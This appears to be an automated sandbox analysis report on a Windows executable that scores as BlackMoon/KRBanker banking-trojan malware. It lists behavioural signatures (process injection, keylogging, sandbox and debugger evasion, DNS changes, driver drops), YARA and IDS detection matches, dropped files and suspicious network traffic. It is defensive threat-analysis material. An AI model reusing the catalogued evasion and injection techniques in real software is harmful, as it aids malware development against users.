Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VIP-#U4f1a#U5458#U7248.exe

Overview

General Information

Sample name:VIP-#U4f1a#U5458#U7248.exe
renamed because original name is a hash value
Original sample name:VIP-.exe
Analysis ID:1569132
MD5:79e8c7fc08846104c300079e8f9cfff2
SHA1:b9d9e952375e973d71a077973f6be03f6b9a1987
SHA256:0a1dc880d7c52be7311f2870481796bba315774f7c646876f88dc84837f3b4c0
Tags:exefragtoruser-zhuzhu0009
Infos:

Detection

BlackMoon
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected BlackMoon Ransomware
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject threads in other processes
Detected VMProtect packer
Found driver which could be used to inject code into processes
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the DNS server
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file has a writeable .text section
Sample is not signed and drops a device driver
Sample is protected by VMProtect
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates or modifies windows services
Deletes Internet Explorer cookies via registry
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • VIP-#U4f1a#U5458#U7248.exe (PID: 3788 cmdline: "C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exe" MD5: 79E8C7FC08846104C300079E8F9CFFF2)
    • D74384FB8D2C9.exe (PID: 5448 cmdline: "C:\Program Files (x86)\google\D74384FB8D2C9.exe" WfCSiyl7KCmSL4J0fXwpklp7KYEqfR6ShFd+QzmL6nTfLzmL6+rr5jmL5ejq5jx7JntO MD5: 0D79B45E55C20F14D9614596247B7DF2)
  • svchost.exe (PID: 744 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
KrBanker, BlackMoonThreatPost describes KRBanker (Blackmoon) as a banking Trojan designed to steal user credentials from various South Korean banking institutions. It was discovered in early 2014 and since then has adopted a variety of infection and credential stealing techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dllJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
    C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dllMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
    • 0xcd53c:$s1: blackmoon
    • 0xcd57c:$s2: BlackMoon RunTime Error:
    C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dllJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
      C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dllMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
      • 0x470fc0:$s1: blackmoon
      • 0x471000:$s2: BlackMoon RunTime Error:

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Modification of IE Registry Settings
      Source: Registry Key setAuthor: frack113: Data: Details: 3, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Google\D74384FB8D2C9.exe, ProcessId: 5448, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 744, ProcessName: svchost.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-05T14:25:19.638998+010028032742Potentially Bad Traffic192.168.2.549723119.29.29.2980TCP
      2024-12-05T14:25:20.255035+010028032742Potentially Bad Traffic192.168.2.549721182.254.116.11680TCP
      2024-12-05T14:25:31.983543+010028032742Potentially Bad Traffic192.168.2.549759182.254.116.11680TCP
      2024-12-05T14:25:31.984552+010028032742Potentially Bad Traffic192.168.2.549761182.254.116.11680TCP
      2024-12-05T14:25:32.084642+010028032742Potentially Bad Traffic192.168.2.549760119.29.29.2980TCP
      2024-12-05T14:25:32.089093+010028032742Potentially Bad Traffic192.168.2.549758119.29.29.2980TCP
      2024-12-05T14:25:40.148938+010028032742Potentially Bad Traffic192.168.2.549722114.114.114.11480TCP
      2024-12-05T14:25:43.383580+010028032742Potentially Bad Traffic192.168.2.549730114.114.114.11480TCP
      2024-12-05T14:25:46.334829+010028032742Potentially Bad Traffic192.168.2.549797119.29.29.2980TCP
      2024-12-05T14:25:46.336136+010028032742Potentially Bad Traffic192.168.2.549796119.29.29.2980TCP
      2024-12-05T14:25:46.960635+010028032742Potentially Bad Traffic192.168.2.549798182.254.116.11680TCP
      2024-12-05T14:25:46.960886+010028032742Potentially Bad Traffic192.168.2.549799182.254.116.11680TCP
      2024-12-05T14:26:02.165299+010028032742Potentially Bad Traffic192.168.2.549784114.114.114.11480TCP
      2024-12-05T14:26:05.431002+010028032742Potentially Bad Traffic192.168.2.549792114.114.114.11480TCP
      2024-12-05T14:26:22.302707+010028032742Potentially Bad Traffic192.168.2.549892119.29.29.2980TCP
      2024-12-05T14:26:22.489188+010028032742Potentially Bad Traffic192.168.2.549846114.114.114.11480TCP
      2024-12-05T14:26:22.489234+010028032742Potentially Bad Traffic192.168.2.549854114.114.114.11480TCP
      2024-12-05T14:26:22.489252+010028032742Potentially Bad Traffic192.168.2.549893182.254.116.11680TCP
      2024-12-05T14:26:32.332586+010028032742Potentially Bad Traffic192.168.2.549920119.29.29.2980TCP
      2024-12-05T14:26:32.876493+010028032742Potentially Bad Traffic192.168.2.549921182.254.116.11680TCP
      2024-12-05T14:26:39.492886+010028032742Potentially Bad Traffic192.168.2.549944119.29.29.2980TCP
      2024-12-05T14:26:39.844409+010028032742Potentially Bad Traffic192.168.2.549943182.254.116.11680TCP
      2024-12-05T14:26:46.521255+010028032742Potentially Bad Traffic192.168.2.549961119.29.29.2980TCP
      2024-12-05T14:26:46.864753+010028032742Potentially Bad Traffic192.168.2.549962182.254.116.11680TCP
      2024-12-05T14:26:53.027833+010028032742Potentially Bad Traffic192.168.2.549922114.114.114.11480TCP
      2024-12-05T14:26:54.369878+010028032742Potentially Bad Traffic192.168.2.549985119.29.29.2980TCP
      2024-12-05T14:26:55.637475+010028032742Potentially Bad Traffic192.168.2.549986182.254.116.11680TCP
      2024-12-05T14:26:59.513848+010028032742Potentially Bad Traffic192.168.2.550002119.29.29.2980TCP
      2024-12-05T14:26:59.906551+010028032742Potentially Bad Traffic192.168.2.550001182.254.116.11680TCP
      2024-12-05T14:27:00.150774+010028032742Potentially Bad Traffic192.168.2.549942114.114.114.11480TCP
      2024-12-05T14:27:01.395278+010028032742Potentially Bad Traffic192.168.2.549987114.114.114.11480TCP
      2024-12-05T14:27:01.395384+010028032742Potentially Bad Traffic192.168.2.550009114.114.114.11480TCP
      2024-12-05T14:27:05.633759+010028032742Potentially Bad Traffic192.168.2.550014114.114.114.11480TCP
      2024-12-05T14:27:07.295551+010028032742Potentially Bad Traffic192.168.2.550027119.29.29.2980TCP
      2024-12-05T14:27:07.649580+010028032742Potentially Bad Traffic192.168.2.550026182.254.116.11680TCP
      2024-12-05T14:27:09.941646+010028032742Potentially Bad Traffic192.168.2.550028114.114.114.11480TCP
      2024-12-05T14:27:14.318476+010028032742Potentially Bad Traffic192.168.2.550047119.29.29.2980TCP
      2024-12-05T14:27:14.664651+010028032742Potentially Bad Traffic192.168.2.550046182.254.116.11680TCP
      2024-12-05T14:27:16.961981+010028032742Potentially Bad Traffic192.168.2.550048114.114.114.11480TCP
      2024-12-05T14:27:21.254480+010028032742Potentially Bad Traffic192.168.2.550069119.29.29.2980TCP
      2024-12-05T14:27:21.595844+010028032742Potentially Bad Traffic192.168.2.550068182.254.116.11680TCP
      2024-12-05T14:27:23.910418+010028032742Potentially Bad Traffic192.168.2.550067114.114.114.11480TCP
      2024-12-05T14:27:26.246010+010028032742Potentially Bad Traffic192.168.2.550083119.29.29.2980TCP
      2024-12-05T14:27:26.661897+010028032742Potentially Bad Traffic192.168.2.550084182.254.116.11680TCP
      2024-12-05T14:27:34.363435+010028032742Potentially Bad Traffic192.168.2.550090119.29.29.2980TCP
      2024-12-05T14:27:35.259924+010028032742Potentially Bad Traffic192.168.2.550089182.254.116.11680TCP
      2024-12-05T14:27:46.901575+010028032742Potentially Bad Traffic192.168.2.550082114.114.114.11480TCP
      2024-12-05T14:27:55.026580+010028032742Potentially Bad Traffic192.168.2.550088114.114.114.11480TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: VIP-#U4f1a#U5458#U7248.exeAvira: detected
      Antivirus detection for dropped file
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dllAvira: detection malicious, Label: TR/Inject.zdewt
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeAvira: detection malicious, Label: HEUR/AGEN.1315452
      Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dllAvira: detection malicious, Label: HEUR/AGEN.1328196
      Source: C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dllAvira: detection malicious, Label: HEUR/AGEN.1328190
      Source: C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dllAvira: detection malicious, Label: HEUR/AGEN.1328190
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\B790E0\A2F0jleks.dllReversingLabs: Detection: 75%
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\BCF54838A16\FC14NMPKD.dllReversingLabs: Detection: 58%
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\CCDF613EA366\5B38DA6A8.dllReversingLabs: Detection: 66%
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\E03C4D\8FD7ijlhc.exeReversingLabs: Detection: 34%
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dllReversingLabs: Detection: 54%
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dllReversingLabs: Detection: 61%
      Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dllReversingLabs: Detection: 84%
      Source: C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dllReversingLabs: Detection: 54%
      Source: C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dllReversingLabs: Detection: 78%
      Source: C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dllReversingLabs: Detection: 78%
      Source: C:\Windows\D74384F.sysReversingLabs: Detection: 62%
      Source: C:\Windows\SysWOW64\22FD558C8.sysReversingLabs: Detection: 62%
      Multi AV Scanner detection for submitted file
      Source: VIP-#U4f1a#U5458#U7248.exeReversingLabs: Detection: 52%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
      Machine Learning detection for dropped file
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\IBB2930D\D5AESTNHE.dllJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\VIP-#U4f1a#U5458#U7248.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\BCF54838A16\FC14NMPKD.dllJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\E03C4D\8FD7ijlhc.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\GD085C\5801srmps.dllJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\FEBB9DF1\E816IBB62.dllJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\CCDF613EA366\5B38DA6A8.dllJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\B790E0\A2F0jleks.dllJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\I2DF4C59\F04bWTUR.dllJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\D2EDCA7E\H4B6E7061C\E875FIB50.dllJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\CFA702\JF8BA35\F977IID54.dllJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: VIP-#U4f1a#U5458#U7248.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6DB2B0 CryptMsgGetParam,_printf,_printf,CertGetNameStringA,LocalAlloc,CertGetNameStringA,CertGetNameStringA,LocalFree,CertGetNameStringA,LocalAlloc,CertGetNameStringA,_strncpy,2_2_6A6DB2B0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6DB450 CryptMsgGetParam,lstrcmpA,CryptDecodeObject,CryptDecodeObject,LocalAlloc,CryptDecodeObject,2_2_6A6DB450
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6DB5E0 CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,_printf,CertFindCertificateInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,2_2_6A6DB5E0
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6DB5C4 CryptMsgGetParam,LocalFree,2_2_6A6DB5C4
      Source: VIP-#U4f1a#U5458#U7248.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: VIP-#U4f1a#U5458#U7248.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: G:\projects\funny\GamePluginCtrl\Release\gamePluginCtrl.pdb source: D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2098003349.0000000005650000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2110668560.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117568141.000000000564E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2106887093.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2097391603.0000000005635000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2124972973.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2213442539.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125866187.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2110514398.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2106102550.0000000005650000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219458854.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125707363.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2100380408.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2110292883.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117790220.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2100550998.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2106586251.0000000005653000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmp, A2F0jleks.dll.2.dr
      Source: Binary string: \bin\xkSHWL.pdb source: D74384FB8D2C9.exe, 00000002.00000003.2125803402.0000000005649000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125707363.0000000005647000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125941640.0000000005649000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2125803402.0000000005635000.00000004.00000020.00020000.00000000.sdmp, E875FIB50.dll.2.dr
      Source: Binary string: DPK\bin\dlq.pdb source: D74384FB8D2C9.exe, 00000002.00000003.2124316210.0000000005635000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2124316210.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 5801srmps.dll.2.dr
      Source: Binary string: DPK\bin\DPK.pdbL source: FC14NMPKD.dll.2.dr
      Source: Binary string: G:\projects\G\tools\emptyDll\Release\emptyDll.pdb @ source: D74384FB8D2C9.exe, 00000002.00000003.2117661174.0000000005638000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118239113.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117661174.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118127196.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118216832.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118035942.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118016119.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117790220.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117907299.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117731532.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117995127.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118264440.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117568141.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 4509OKKGD.dll.2.dr, 21AAtnoki.dll.2.dr, 346DgjhcV.dll.2.dr
      Source: Binary string: DPK\bin\DPK.pdb source: FC14NMPKD.dll.2.dr
      Source: Binary string: DPK\bin\JDClient.pdb source: 8FD7ijlhc.exe.2.dr
      Source: Binary string: G:\projects\G\tools\emptyDll\Release\emptyDll.pdb source: D74384FB8D2C9.exe, 00000002.00000003.2117661174.0000000005638000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118239113.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117661174.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118127196.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118216832.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118035942.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118016119.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117790220.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117907299.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117731532.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117995127.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2118264440.000000000564A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2117568141.0000000005647000.00000004.00000020.00020000.00000000.sdmp, 4509OKKGD.dll.2.dr, 21AAtnoki.dll.2.dr, 346DgjhcV.dll.2.dr
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE9BA3C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,2_2_0BE9BA3C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0BE9622C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_0BE9622C
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6FB28B __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,2_2_6A6FB28B
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0040D170 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,_strncpy,FindNextFileA,2_2_0040D170
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_0040D640 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,2_2_0040D640
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior

      Networking

      barindex
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 5566
      Source: unknownNetwork traffic detected: HTTP traffic on port 5566 -> 49706
      Source: global trafficTCP traffic: 192.168.2.5:49706 -> 43.154.56.182:5566
      Source: Joe Sandbox ViewIP Address: 104.192.110.226 104.192.110.226
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49761 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49760 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49723 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49758 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49730 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49759 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49796 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49797 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49799 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49798 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49784 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49792 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49722 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49892 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49854 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49846 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49893 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49920 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49961 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49944 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49921 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49943 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49962 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49985 -> 119.29.29.29:80
